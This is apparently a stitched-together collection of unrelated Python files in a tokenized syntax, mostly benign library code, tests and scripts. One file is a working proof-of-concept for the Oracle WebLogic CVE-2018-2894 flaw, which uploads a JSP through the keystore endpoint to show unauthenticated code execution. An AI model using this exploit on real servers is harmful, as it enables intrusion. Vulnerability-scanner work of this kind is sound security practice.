self._children:Dict[Union[T <none>] List[T]]={<none>:[]}<line_sep># For easy and fast lookups, also maintain a child -> parent mapping
self._parents:Dict[T T]={}<block_end>@property<def_stmt>nodes self<arrow>Sequence[T]<block_start><return>list(self._nodes)<block_end><def_stmt>get_parent self node:T<arrow>Optional[T]<block_start>"""Return the parent item of ``node``.
>>> tree = Tree()
>>> tree.add('n1')
>>> tree.add('n2', parent='n1')
>>> tree.get_parent('n2')
'n1'
"""<line_sep><return>self._parents.get(node)<block_end><def_stmt>get_children self node:Optional[T]<arrow>Iterable[T]<block_start>"""Return all child objects of ``node``.
>>> tree = Tree()
>>> tree.add('n1')
>>> tree.add('n2', parent='n1')
>>> tree.add('n3', parent='n1')
>>> tree.get_children('n1')
['n2', 'n3']
>>> tree.get_children('n2')
[]
"""<line_sep><return>self._children[node]<block_end><def_stmt>get_siblings self node:T<arrow>List[T]<block_start>"""Get all siblings of ``node``, including ``node``.
>>> tree = Tree()
>>> tree.add('n1')
>>> tree.add('n2', parent='n1')
>>> tree.add('n3', parent='n1')
>>> tree.get_siblings('n2')
['n2', 'n3']
"""<line_sep>parent=self.get_parent(node)<line_sep><return>self._children[parent]<block_end><def_stmt>get_next_sibling self node:T<arrow>T<block_start>"""Return the node on the same level after ``node``.
>>> tree = Tree()
>>> tree.add('n1')
>>> tree.add('n2', parent='n1')
>>> tree.add('n3', parent='n1')
>>> tree.get_next_sibling('n2')
'n3'
>>> tree.get_next_sibling('n3') # doctest: +ELLIPSIS
Traceback (most recent call last):
...
IndexError: list index out of range
"""<line_sep>parent=self.get_parent(node)<line_sep>siblings=self._children[parent]<line_sep><return>siblings[siblings.index(node)+1]<block_end><def_stmt>get_previous_sibling self node:T<arrow>T<block_start>"""Return the node on the same level before ``node``.
>>> tree = Tree()
>>> tree.add('n1')
>>> tree.add('n2', parent='n1')
>>> tree.add('n3', parent='n1')
>>> tree.get_previous_sibling('n3')
'n2'
>>> tree.get_previous_sibling('n2') # doctest: +ELLIPSIS
Traceback (most recent call last):
...
IndexError: list index out of range
"""<line_sep>parent=self.get_parent(node)<line_sep>siblings=self._children[parent]<line_sep>index=siblings.index(node)-1<if_stmt>index<l>0<block_start><raise>IndexError("list index out of range")<block_end><return>siblings[index]<block_end><def_stmt>get_all_children self node:T<arrow>Iterable[T]<block_start>"""Iterate all children (and children of children and so forth)
>>> tree = Tree()
>>> tree.add('n1')
>>> tree.add('n2', parent='n1')
>>> tree.add('n3', parent='n2')
>>> tree.get_children('n1')
['n2']
>>> tree.get_all_children('n1') # doctest: +ELLIPSIS
<generator object Tree.get_all_children at 0x...>
>>> list(tree.get_all_children('n1'))
['n2', 'n3']
"""<line_sep>children=self.get_children(node)<for_stmt>c children<block_start><yield>c<line_sep><yield><from>self.get_all_children(c)<block_end><block_end><def_stmt>get_ancestors self node:T<arrow>Iterable[T]<block_start>"""Iterate all parents and parents of parents, etc.
>>> tree = Tree()
>>> tree.add('n1')
>>> tree.add('n2', parent='n1')
>>> tree.add('n3', parent='n2')
>>> tree.get_parent('n3')
'n2'
>>> tree.get_ancestors('n3') # doctest: +ELLIPSIS
<generator object Tree.get_ancestors at 0x...>
>>> list(tree.get_ancestors('n3'))
['n2', 'n1']
>>> list(tree.get_ancestors('n1'))
[]
"""<line_sep>parent=self.get_parent(node)<while_stmt>parent<block_start><yield>parent<line_sep>parent=self.get_parent(parent)<block_end><block_end><def_stmt>order self items:Iterable[T]<arrow>Iterable[T]<block_start>items_set=set(items)<line_sep><return>(n<for>n self._nodes<if>n<in>items_set)<block_end><def_stmt>_add_to_nodes self node:T parent:Optional[T] index:Optional[int]=<none><arrow><none><block_start>"""Helper method to place nodes on the right location in the nodes list
Called only from add() and move()"""<line_sep>nodes=self._nodes<line_sep>siblings=self._children[parent]<try_stmt><block_start>atnode=siblings[index]# type: ignore[index]
<block_end><except_stmt>(TypeError IndexError)<block_start>index=len(siblings)<if_stmt>parent<block_start><try_stmt><block_start>next_uncle=self.get_next_sibling(parent)<block_end><except_stmt>IndexError# parent has no younger brothers..
# place it before the next uncle of grant_parent:
<block_start><return>self._add_to_nodes(node self.get_parent(parent))<block_end><else_stmt><block_start>nodes.insert(nodes.index(next_uncle) node)<block_end><block_end><else_stmt># append to root node:
<block_start>nodes.append(node)<block_end><block_end><else_stmt><block_start>nodes.insert(nodes.index(atnode) node)<block_end><block_end><def_stmt>_add self node:T parent:Optional[T]=<none> index:Optional[int]=<none><arrow><none><block_start>"""Helper method for both add() and move()."""<assert_stmt>node<not><in>self._nodes<line_sep>siblings=self._children[parent]<line_sep>self._add_to_nodes(node parent index)<line_sep># Fix parent-child and child-parent relationship
<try_stmt><block_start>siblings.insert(index node)# type: ignore[arg-type]
<block_end><except_stmt>TypeError<block_start>siblings.append(node)<block_end># Create new entry for it's own children:
<if_stmt>parent<block_start>self._parents[node]=parent<block_end><block_end><def_stmt>add self node:T parent:Optional[T]=<none> index:Optional[int]=<none><arrow><none><block_start>"""Add node to the tree. parent is the parent node, which may be None
if the item should be added to the root item.
For usage, see the unit tests.
"""<line_sep>self._add(node parent index)<line_sep>self._children[node]=[]<block_end><def_stmt>_remove self node:T<arrow><none># Remove from parent item
<block_start>self.get_siblings(node).remove(node)<line_sep># Remove data entries:
<del_stmt>self._children[node]<line_sep>self._nodes.remove(node)<try_stmt><block_start><del_stmt>self._parents[node]<block_end><except_stmt>KeyError<block_start><pass><block_end><block_end><def_stmt>remove self node:T<arrow><none><block_start>"""Remove ``node`` from the tree.
For usage, see the unit tests.
"""<line_sep># First remove children:
<for_stmt>c reversed(list(self._children[node]))<block_start>self.remove(c)<block_end>self._remove(node)<block_end><def_stmt>_reparent_nodes self node:T parent:Optional[T]<arrow><none><block_start>"""Helper for move().
The _children and _parents mappings can be left intact as far as
children of the reparented node are concerned. Only the position
in the _nodes list changes.
"""<line_sep>self._nodes.remove(node)<line_sep>self._add_to_nodes(node parent)<for_stmt>c self._children[node]<block_start>self._reparent_nodes(c node)<block_end><block_end><def_stmt>move self node:T parent:Optional[T] index:Optional[int]=<none><arrow><none><block_start>"""Set new parent for a ``node``. ``Parent`` can be ``None``,
indicating it's added to the top.
>>> tree = Tree()
>>> tree.add('n1')
>>> tree.add('n2', parent='n1')
>>> tree.add('n3', parent='n1')
>>> tree.nodes
['n1', 'n2', 'n3']
>>> tree.move('n2', 'n3')
>>> tree.get_parent('n2')
'n3'
>>> tree.get_children('n3')
['n2']
>>> tree.nodes
['n1', 'n3', 'n2']
If a node contains children, those are also moved:
>>> tree.add('n4')
>>> tree.nodes
['n1', 'n3', 'n2', 'n4']
>>> tree.move('n1', 'n4')
>>> tree.get_parent('n1')
'n4'
>>> list(tree.get_all_children('n4'))
['n1', 'n3', 'n2']
>>> tree.nodes
['n4', 'n1', 'n3', 'n2']
"""<if_stmt>parent<is>self.get_parent(node)<block_start><return><block_end># Remove all node references:
old_parent=self.get_parent(node)<line_sep>self._children[old_parent].remove(node)<line_sep>self._nodes.remove(node)<if_stmt>old_parent<block_start><del_stmt>self._parents[node]<block_end>self._add(node parent index)<line_sep># reorganize children in nodes list
<for_stmt>c self._children[node]<block_start>self._reparent_nodes(c node)<block_end><block_end><block_end>
|
<import_stmt>pytest<import_stmt>fastapi_chameleon<as>fc<import_from_stmt>fastapi_chameleon.exceptions FastAPIChameleonException<def_stmt>test_cannot_decorate_with_missing_init <block_start>fc.engine.clear()<with_stmt>pytest.raises(FastAPIChameleonException)<block_start>@fc.template('home/index.pt')<def_stmt>view_method a b c<block_start><return>{"a":a "b":b "c":c}<block_end>view_method(1 2 3)<block_end><block_end><def_stmt>test_can_call_init_with_good_path test_templates_path<block_start>fc.global_init(str(test_templates_path) cache_init=<false>)<line_sep># Clear paths so as to no affect future tests
fc.engine.clear()<block_end><def_stmt>test_cannot_call_init_with_bad_path test_templates_path<block_start>bad_path=test_templates_path/"missing"<with_stmt>pytest.raises(Exception)<block_start>fc.global_init(str(bad_path) cache_init=<false>)<block_end><block_end>
|
<import_stmt>uuid<class_stmt>ObjectId(object)<block_start><def_stmt>__init__ self id=<none><block_start>super(ObjectId self).__init__()<if_stmt>id<is><none><block_start>self._id=uuid.uuid1()<block_end><else_stmt><block_start>self._id=uuid.UUID(id)<block_end><block_end><def_stmt>__eq__ self other<block_start><return>isinstance(other ObjectId)<and>other._id<eq>self._id<block_end><def_stmt>__ne__ self other<block_start><return><not>self<eq>other<block_end><def_stmt>__hash__ self<block_start><return>hash(self._id)<block_end><def_stmt>__repr__ self<block_start><return>'ObjectId({0})'.format(self._id)<block_end><def_stmt>__str__ self<block_start><return>str(self._id)<block_end><block_end>
|
<import_stmt>svox2<import_stmt>torch<import_stmt>numpy<as>np<import_from_stmt>util Timing<import_from_stmt>matplotlib pyplot<as>plt<line_sep>device='cuda:0'<line_sep>GRID_FILE='lego.npy'<line_sep>grid=svox2.SparseGrid(reso=256 device='cpu' radius=1.3256)<line_sep>data=torch.from_numpy(np.load(GRID_FILE)).view(-1 grid.data_dim)<line_sep>grid.sh_data.data=data[<ellipsis> 1:]<line_sep>grid.density_data.data=data[<ellipsis> :1]<line_sep># grid.resample(128, use_z_order=True)
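# the rest of the script moves the grid to the GPU, builds per-pixel rays for an 800x800 pinhole camera (fx = fy = 1111) from the fixed camera-to-world pose, renders them with the fused CUDA kernel, and displays the result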
grid=grid.cuda()<line_sep>c2w=torch.tensor([[-0.9999999403953552 0.0 0.0 0.0] [0.0 -0.7341099977493286 0.6790305972099304 2.737260103225708] [0.0 0.6790306568145752 0.7341098785400391 2.959291696548462] [0.0 0.0 0.0 1.0] ] device=device)<with_stmt>torch.no_grad()<block_start>width=height=800<line_sep>fx=fy=1111<line_sep>origins=c2w[<none> :3 3].expand(height<times>width -1).contiguous()<line_sep>yy,xx=torch.meshgrid(torch.arange(height dtype=torch.float64 device=c2w.device) torch.arange(width dtype=torch.float64 device=c2w.device) )<line_sep>xx=(xx-width<times>0.5)/float(fx)<line_sep>yy=(yy-height<times>0.5)/float(fy)<line_sep>zz=torch.ones_like(xx)<line_sep>dirs=torch.stack((xx -yy -zz) dim=-1)<line_sep>dirs<augdiv>torch.norm(dirs dim=-1 keepdim=<true>)<line_sep>dirs=dirs.reshape(-1 3)<del_stmt>xx yy zz<line_sep>dirs=torch.matmul(c2w[<none> :3 :3].double() dirs[<ellipsis> <none>])[<ellipsis> 0].float()<line_sep>dirs=dirs/torch.norm(dirs dim=-1 keepdim=<true>)<line_sep>rays=svox2.Rays(origins dirs)<for_stmt>i range(5)<block_start><with_stmt>Timing("ours")<block_start>im=grid.volume_render(rays use_kernel=<true>)<block_end><block_end>im=im.reshape(height width 3)<line_sep>im=im.detach().clamp_(0.0 1.0).cpu()<line_sep>plt.imshow(im)<line_sep>plt.show()<block_end>
|
# -*- coding: utf-8 -*-
"""Top-level package for nider."""<line_sep>__author__="""<NAME>"""<line_sep>__email__='<EMAIL>'<line_sep>__version__='0.5.0'<line_sep>
|
<import_stmt>time<import_from_stmt>logging getLogger<import_from_stmt>gym.wrappers Monitor<as>_GymMonitor<import_from_stmt>gym.wrappers.monitoring.stats_recorder StatsRecorder<as>_GymStatsRecorder<class_stmt>Monitor(_GymMonitor)<block_start>"""`Monitor` with PFRL's `ContinuingTimeLimit` support.
`Agent` in PFRL might reset the env even when `done=False`
if `ContinuingTimeLimit` returns `info['needs_reset']=True`,
which is not expected for `gym.Monitor`.
For details, see
https://github.com/openai/gym/blob/master/gym/wrappers/monitor.py
"""<def_stmt>_start self directory video_callable=<none> force=<false> resume=<false> write_upon_reset=<false> uid=<none> mode=<none> <block_start><if_stmt>self.env_semantics_autoreset<block_start><raise>NotImplementedError("Detect 'semantics.autoreset=True' in `env.metadata`, "<concat>"which means the env is from deprecated OpenAI Universe.")<block_end>ret=super()._start(directory=directory video_callable=video_callable force=force resume=resume write_upon_reset=write_upon_reset uid=uid mode=mode )<line_sep>env_id=self.stats_recorder.env_id<line_sep>self.stats_recorder=_StatsRecorder(directory "{}.episode_batch.{}".format(self.file_prefix self.file_infix) autoreset=<false> env_id=env_id )<if_stmt>mode<is><not><none><block_start>self._set_mode(mode)<block_end><return>ret<block_end><block_end><class_stmt>_StatsRecorder(_GymStatsRecorder)<block_start>"""`StatsRecorder` with PFRL's `ContinuingTimeLimit` support.
For details, see
https://github.com/openai/gym/blob/master/gym/wrappers/monitoring/stats_recorder.py
"""<def_stmt>__init__ self directory file_prefix autoreset=<false> env_id=<none> logger=getLogger(__name__) <block_start>super().__init__(directory file_prefix autoreset=autoreset env_id=env_id)<line_sep>self._save_completed=<true><line_sep>self.logger=logger<block_end><def_stmt>before_reset self<block_start><assert_stmt><not>self.closed<if_stmt>self.done<is><not><none><and><not>self.done<and>self.steps<g>0<block_start>self.logger.debug("Tried to reset the env which is not done=True. "<concat>"StatsRecorder completes the last episode.")<line_sep>self.save_complete()<block_end>self.done=<false><if_stmt>self.initial_reset_timestamp<is><none><block_start>self.initial_reset_timestamp=time.time()<block_end><block_end><def_stmt>after_step self observation reward done info<block_start>self._save_completed=<false><line_sep><return>super().after_step(observation reward done info)<block_end><def_stmt>save_complete self<block_start><if_stmt><not>self._save_completed<block_start>super().save_complete()<line_sep>self._save_completed=<true><block_end><block_end><def_stmt>close self<block_start>self.save_complete()<line_sep>super().close()<block_end><block_end>
|
<import_stmt>requests<line_sep># Vuln Base Info
<def_stmt>info <block_start><return>{"author":"cckuailong" "name":'''Oracle WebLogic RCE''' "description":'''Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server.''' "severity":"critical" "references":["https://blog.detectify.com/2018/11/14/technical-explanation-of-cve-2018-2894-oracle-weblogic-rce/" "https://github.com/vulhub/vulhub/tree/fda47b97c7d2809660a4471539cd0e6dbf8fac8c/weblogic/CVE-2018-2894"] "classification":{"cvss-metrics":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" "cvss-score":"" "cve-id":"CVE-2018-2894" "cwe-id":""} "metadata":{"vuln-target":"" } "tags":["cve" "cve2018" "oracle" "weblogic" "rce"] }<block_end># Vender Fingerprint
<def_stmt>fingerprint url<block_start><return><true><block_end># Proof of Concept
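# flow: point the WLS work directory at the web-accessible css path, upload a JSP through the keystore endpoint, then request it and check for the MD5 marker it prints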
<def_stmt>poc url<block_start>result={}<try_stmt><block_start>url=format_url(url)<line_sep>path="""/ws_utc/resources/setting/options"""<line_sep>method="POST"<line_sep>data="""setting_id=general&BasicConfigOptions.workDir=%2Fu01%2Foracle%2Fuser_projects%2Fdomains%2Fbase_domain%2Fservers%2FAdminServer%2Ftmp%2F_WL_internal%2Fcom.oracle.webservices.wls.ws-testclient-app-wls%2F4mcj4y%2Fwar%2Fcss&BasicConfigOptions.proxyHost=&BasicConfigOptions.proxyPort=80"""<line_sep>headers={'Content-Type':'application/x-www-form-urlencoded'}<line_sep>resp0=requests.request(method=method url=url+path data=data headers=headers timeout=10 verify=<false> allow_redirects=<false>)<line_sep>path="""/ws_utc/resources/setting/keystore"""<line_sep>method="POST"<line_sep>data="""------WebKitFormBoundaryuim0dyiDSPBPu31g
Content-Disposition: form-data; name="ks_name"
{{randstr}}
------WebKitFormBoundaryuim0dyiDSPBPu31g
Content-Disposition: form-data; name="ks_edit_mode"
false
------WebKitFormBoundaryuim0dyiDSPBPu31g
Content-Disposition: form-data; name="ks_password_front"
------WebKitFormBoundaryuim0dyiDSPBPu31g
Content-Disposition: form-data; name="ks_password"
------WebKitFormBoundaryuim0dyiDSPBPu31g
Content-Disposition: form-data; name="ks_password_changed"
false
------WebKitFormBoundaryuim0dyiDSPBPu31g
Content-Disposition: form-data; name="ks_filename"; filename="{{randstr}}.jsp"
Content-Type: application/octet-stream
<%@ page import="java.util.*,java.io.*"%>
<%@ page import="java.security.MessageDigest"%>
<%
String cve = "CVE-2018-2894";
MessageDigest alg = MessageDigest.getInstance("MD5");
alg.reset();
alg.update(cve.getBytes());
byte[] digest = alg.digest();
StringBuffer hashedpasswd = new StringBuffer();
String hx;
for (int i=0;i<digest.length;i++){
hx = Integer.toHexString(0xFF & digest[i]);
//0x03 is equal to 0x3, but we need 0x03 for our md5sum
if(hx.length() == 1){hx = "0" + hx;}
hashedpasswd.append(hx);
}
out.println(hashedpasswd.toString());
%>
------WebKitFormBoundaryuim0dyiDSPBPu31g--"""<line_sep>headers={'Content-Type':'multipart/form-data; boundary=----WebKitFormBoundaryuim0dyiDSPBPu31g'}<line_sep>resp1=requests.request(method=method url=url+path data=data headers=headers timeout=10 verify=<false> allow_redirects=<false>)<line_sep>path="""/ws_utc/css/config/keystore/{{id}}_{{randstr}}.jsp"""<line_sep>method="GET"<line_sep>data=""""""<line_sep>headers={}<line_sep>resp2=requests.request(method=method url=url+path data=data headers=headers timeout=10 verify=<false> allow_redirects=<false>)<if_stmt>("""26ec00a3a03f6bfc5226fd121567bb58"""<in>resp2.text)<block_start>result["success"]=<true><line_sep>result["info"]=info()<line_sep>result["payload"]=url+path<block_end><block_end><except_stmt><block_start>result["success"]=<false><block_end><return>result<block_end># Exploit, can be same with poc()
<def_stmt>exp url<block_start><return>poc(url)<block_end># Utils
<def_stmt>format_url url<block_start>url=url.strip()<if_stmt><not>(url.startswith('http://')<or>url.startswith('https://'))<block_start>url='http://'+url<block_end>url=url.rstrip('/')<line_sep><return>url<block_end>
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Functional tests for XLA Reverse Ops."""<import_from_future_stmt> absolute_import<import_from_future_stmt> division<import_from_future_stmt> print_function<import_stmt>itertools<import_stmt>numpy<as>np<import_from_stmt>tensorflow.compiler.tests xla_test<import_from_stmt>tensorflow.python.framework constant_op<import_from_stmt>tensorflow.python.framework dtypes<import_from_stmt>tensorflow.python.ops array_ops<import_from_stmt>tensorflow.python.platform googletest<class_stmt>ReverseOpsTest(xla_test.XLATestCase)<block_start><def_stmt>testReverseOneDim self<block_start>shape=(7 5 9 11)<for_stmt>revdim range(-len(shape) len(shape))<block_start>self._AssertReverseEqual([revdim] shape)<block_end><block_end><def_stmt>testReverseMoreThanOneDim self<block_start>shape=(7 5 9 11)<line_sep># The offset is used to test various (but not all) combinations of negative
# and positive axis indices that are guaranteed to not collide at the same
# index.
<for_stmt>revdims itertools.chain.from_iterable(itertools.combinations(range(-offset len(shape)-offset) k)<for>k range(2 len(shape)+1)<for>offset range(0 len(shape)))<block_start>self._AssertReverseEqual(revdims shape)<block_end><block_end><def_stmt>_AssertReverseEqual self revdims shape<block_start>np.random.seed(120)<line_sep>pval=np.random.randint(0 100 size=shape).astype(float)<with_stmt>self.session()<block_start><with_stmt>self.test_scope()<block_start>p=array_ops.placeholder(dtypes.int32 shape=shape)<line_sep>axis=constant_op.constant(np.array(revdims dtype=np.int32) shape=(len(revdims) ) dtype=dtypes.int32)<line_sep>rval=array_ops.reverse(p axis).eval({p:pval})<line_sep>slices=[slice(-1 <none> -1)<if>d<in>revdims<or>d-len(shape)<in>revdims<else>slice(<none>)<for>d range(len(shape))]<block_end>self.assertEqual(pval[slices].flatten().tolist() rval.flatten().tolist())<block_end><block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>googletest.main()<block_end>
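The slicing check in _AssertReverseEqual relies on the identity that reversing along a set of axes equals indexing those axes with step -1; a minimal NumPy sketch of that equivalence (array shape and axes here are illustrative only):
import numpy as np

x = np.arange(24).reshape(2, 3, 4)
revdims = [0, -1]  # reverse axis 0 and the last axis; negative indices name the same dims
slices = tuple(
    slice(None, None, -1) if d in revdims or d - x.ndim in revdims else slice(None)
    for d in range(x.ndim))
# Reversing with np.flip matches plain step -1 slicing on the chosen axes.
assert (np.flip(np.flip(x, 0), -1) == x[slices]).all()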
|
<import_stmt>os.path<try_stmt><block_start><import_from_stmt>setuptools setup<block_end><except_stmt>ImportError<block_start><import_from_stmt>distutils.core setup<block_end><def_stmt>read filename<block_start><return>open(os.path.join(os.path.dirname(__file__) filename)).read()<block_end>setup(name="elex" version="2.4.4" author="<NAME>, <NAME>" author_email="<EMAIL>, <EMAIL>" url="https://github.com/newsdev/elex" description="Client for parsing the Associated Press's elections API" long_description=read("README.rst") packages=["elex" "elex.cli" "elex.api" "tests"] entry_points={"console_scripts":("elex = elex.cli:main" )} license="Apache License 2.0" keywords="election race candidate democracy news associated press" install_requires=["CacheControl==0.12.*" "cement==2.10.2" "lockfile==0.12.2" "pymongo==3.3" "python-dateutil==2.7.*" "requests==2.20.*" "ujson==1.35" ] classifiers=["Development Status :: 5 - Production/Stable" "Intended Audience :: Developers" "Topic :: Software Development :: Libraries :: Python Modules" "Programming Language :: Python" "Programming Language :: Python :: 2" "Programming Language :: Python :: 2.7" "Programming Language :: Python :: 3" "Programming Language :: Python :: 3.6" ] )<line_sep>
|
##
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##
'''
utils for examples
'''<import_stmt>cupy<as>cp<import_stmt>cudf<def_stmt>create_sorted_cudf_df ncols nrows start=0 step=1<block_start>df_local=cudf.DataFrame()<line_sep>data_start=start<for_stmt>i range(ncols)<block_start>df_local["col-"+str(i)]=cp.arange(start=data_start stop=data_start+nrows<times>step step=step dtype="int64")<line_sep>data_start<augadd>nrows<times>step<block_end><return>df_local<block_end><def_stmt>create_random_data_df ncols nrows low=0 high=1000000000000<block_start>df_local=cudf.DataFrame()<for_stmt>i range(ncols)<block_start>df_local["col-"+str(i)]=cp.random.randint(low=low high=high size=nrows dtype="int64")<block_end><return>df_local<block_end><def_stmt>random_data_df nrows col_lows=[0 100] col_highs=[100 200]<block_start>df_local=cudf.DataFrame()<for_stmt>i range(len(col_lows))<block_start>df_local["col-"+str(i)]=cp.random.randint(low=col_lows[i] high=col_highs[i] size=nrows dtype="int64")<block_end><return>df_local<block_end><import_stmt>string<import_stmt>random<def_stmt>random_str size=6 chars=string.ascii_uppercase+string.digits<block_start>"""
generate a random string with given size and char list
source: https://stackoverflow.com/questions/2257441/random-string-generation-with-upper-case-letters-and-digits?rq=1
"""<line_sep><return>''.join(random.choice(chars)<for>_ range(size))<block_end><def_stmt>create_random_str_df ncols nrows min_digits=2 max_digits=7<block_start>df_local=cudf.DataFrame()<for_stmt>i range(ncols)<block_start>df_local["col-"+str(i)]=[random_str(min_digits+i%(max_digits-min_digits))<for>i range(nrows)]<block_end><return>df_local<block_end><def_stmt>get_size df_size_str<block_start><if_stmt>df_size_str.endswith("MB")<block_start>df_size=df_size_str[:-2]<line_sep>df_size=int(df_size)<times>1000000<line_sep><return>df_size<block_end><elif_stmt>df_size_str.endswith("GB")<block_start>df_size=df_size_str[:-2]<line_sep>df_size=int(df_size)<times>1000000000<line_sep><return>df_size<block_end><else_stmt><block_start><raise>ValueError("Size has to be either MB or GB")<block_end><block_end><def_stmt>get_rows df_size_str ncols<block_start>df_size=get_size(df_size_str)<line_sep># each element is int64, so 8 bytes
<return>int(df_size/(ncols<times>8))<block_end>
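A quick worked example of the sizing arithmetic above (values are illustrative): each row of n int64 columns costs n * 8 bytes, so a "1GB" frame with 4 columns holds 1e9 / 32 rows.
# Illustrative only; assumes the helpers above are in scope.
print(get_size("1GB"))      # 1000000000 bytes
print(get_rows("1GB", 4))   # 31250000 rows = 1_000_000_000 / (4 columns * 8 bytes)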
|
# clue-verysimple-rpsgame v1.0
# CircuitPython rock paper scissors simple text game
# based on https://www.youtube.com/watch?v=dhaaZQyBP2g
# Tested with CLUE and Circuit Playground Bluefruit (Alpha)
# and CircuitPython 5.3.0
# copy this file to CLUE/CPB board as code.py
# MIT License
# Copyright (c) 2015 <NAME>, KidsCanCode LLC
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
<import_stmt>random<line_sep>moves=["r" "p" "s"]<line_sep>player_wins=["pr" "sp" "rs"]<line_sep>print("Rock, paper scissors game: enter first letter for move or q for quit")<while_stmt><true><block_start>player_move=input("Your move: ")<if_stmt>player_move<eq>"q"<block_start><break><block_end>computer_move=random.choice(moves)<line_sep>print("You:" player_move)<line_sep>print("Me:" computer_move)<if_stmt>player_move<eq>computer_move<block_start>print("Tie")<block_end><elif_stmt>player_move+computer_move<in>player_wins<block_start>print("You win!")<block_end><else_stmt><block_start>print("You lose!")<block_end><block_end>
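The win table above encodes each winning (player, computer) pairing as a two-letter string, so a single membership test decides the round; a small sketch of how that lookup behaves:
# "pr" = paper beats rock, "sp" = scissors beat paper, "rs" = rock beats scissors.
print("pr" in player_wins)   # True: player paper vs computer rock is a win
print("rp" in player_wins)   # False: the reversed pairing falls through to "You lose!"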
|
<import_stmt>sys<import_stmt>os<try_stmt><block_start><import_from_stmt>unittest.mock MagicMock<block_end><except_stmt>ImportError<block_start><import_from_stmt>mock Mock<as>MagicMock<block_end><class_stmt>Mock(MagicMock)<block_start>@classmethod<def_stmt>__getattr__ cls name<block_start><return>Mock()<block_end><block_end>MOCK_MODULES=["numpy" "numpy.ma" "xarray" "cartopy" "pandas" "matplotlib" "netCDF4" "mpl_toolkits.basemap" "wrf._wrffortran"]<line_sep>sys.modules.update((mod_name Mock())<for>mod_name MOCK_MODULES)<line_sep>consts={"DEFAULT_FILL":9.9692099683868690E36 "DEFAULT_FILL_INT8":-127 "DEFAULT_FILL_INT16":-32767 "DEFAULT_FILL_INT32":-2147483647 "DEFAULT_FILL_INT64":-9223372036854775806 "DEFAULT_FILL_FLOAT":9.9692099683868690E36 "DEFAULT_FILL_DOUBLE":9.9692099683868690E36 "fomp_sched_static":1 "fomp_sched_dynamic":2 "fomp_sched_guided":3 "fomp_sched_auto":4}<class_stmt>MockWrfConstants(object)<block_start><def_stmt>__init__ self<block_start>self.__dict__=consts<block_end><block_end><def_stmt>mock_asscalar val<block_start><return>float(val)<block_end>sys.modules["wrf._wrffortran"].wrf_constants=MockWrfConstants()<line_sep>sys.modules["wrf._wrffortran"].omp_constants=MockWrfConstants()<line_sep>sys.modules["numpy"].asscalar=mock_asscalar<try_stmt><block_start><import_stmt>wrf<block_end><except_stmt>ImportError<block_start><pass><block_end>print(wrf.get_coord_pairs.__doc__)<line_sep>
|
#
# Copyright (C) [2020] Futurewei Technologies, Inc.
#
# FORCE-RISCV is licensed under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES
# OF ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
# NON-INFRINGEMENT, MERCHANTABILITY OR FIT FOR A PARTICULAR PURPOSE.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# classes, code related to Eret preamble sequence.
<import_from_stmt>base.Sequence Sequence<line_sep># -------------------------------------------------------------------------------------------------------
# EretPreambleSequence to provide base class for eret preamble sequence.
# -------------------------------------------------------------------------------------------------------
<class_stmt>EretPreambleSequence(Sequence)<block_start><def_stmt>__init__ self gen_thread<block_start>super().__init__(gen_thread)<block_end><def_stmt>generate self **kargs<block_start><pass><block_end><block_end>
|
# coding=utf-8
# Copyright 2021 RigL Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Dataset Classes.
Dataset abstraction/factory to allow us to easily use tensorflow datasets (TFDS)
with JAX/FLAX, by defining a bunch of wrappers, including preprocessing.
"""<import_stmt>abc<import_from_stmt>typing MutableMapping Optional<import_stmt>tensorflow.compat.v2<as>tf<import_stmt>tensorflow_datasets<as>tfds<class_stmt>Dataset(metaclass=abc.ABCMeta)<block_start>"""Base class for datasets.
Attributes:
DATAKEY: The key used for the data component of a Tensorflow Dataset
(TFDS) sample, e.g. 'image' for image datasets.
LABELKEY: The key used for the label component of a Tensorflow Dataset
sample, i.e. 'label'.
name: The TFDS name of the dataset.
